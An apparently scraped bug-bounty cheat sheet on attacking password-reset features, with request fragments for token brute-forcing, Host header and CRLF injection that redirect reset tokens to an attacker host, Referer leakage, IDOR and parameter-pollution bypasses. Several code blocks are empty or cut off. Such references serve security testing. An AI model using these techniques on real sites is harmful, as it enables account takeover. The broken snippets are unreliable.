Password Reset Functionality
Below are some references for the Password Reset Functionality attacks.

Concept

In this vulnerability attacker tries to attack the password rest functionality of the application, if the attacker is successful in doing so this might lead to full account takeover, Below are some way to exploit this attack.

Ways to bypass

Include your email as second parameter

Copied!

Brute force the password reset token

1
POST /reset
2
[....]
3
[email protected]&token={bruteforce}
Copied!

Try to use reset token to victims account

1
POST /reset
2
[....]
3
[email protected]&token={yourtoken}
Copied!

Host header injection (try changing the host, this might lead to passing the token to attackers server)

1
POST /reset
2
Host: Attacker.com
Copied!

Try figuring how the tokens are generated

1
Like
2
They might be generated based on timestamp.
3
They might be generated based on the user id.
4
They might be generated based on the email id.
Copied!

CRLF Injection

1
POST /reset
2
[....]
Copied!
1
CLRF:
2
POST /resetPassword?0a%0dHost:atracker.tld (x-host, true-client-ip, x-forwarded...)
Copied!

Business logic

1
While inviting users into your account/organization,
2
you can also try inviting company emails and add a new field
3
"password": "example123". or "pass": "example123" in the
4
request. you may end up resetting a user password.
5
(company email can be found here
6
hunter.io)
Copied!

JSON array

1
POST /reset
2
[....]
Copied!

Token leakage via refer header

1
POST /reset
2
[....]
3
Referer:https://xyz.com/token={token}
Copied!

IDOR for password reset (we can change the id parameter)

1
POST /reset
2
[....]
3
id=1234&
Copied!

Some other ways

    Race condition
    Completely remove the token
    change it to 00000000...
    use null/nil value
    try expired token
    Reusing the old password reset token
    try an array of old tokens
    change 1 char at the begin/end to see if the token is evaluated
    use unicode char jutzu to spoof email address
    try [email protected]&[email protected] use %20 or | as separators
    change request method (get, put, post etc) and/or content type (xml<>json)
    match bad response and replace with good one
    use super long string
Last modified 1yr ago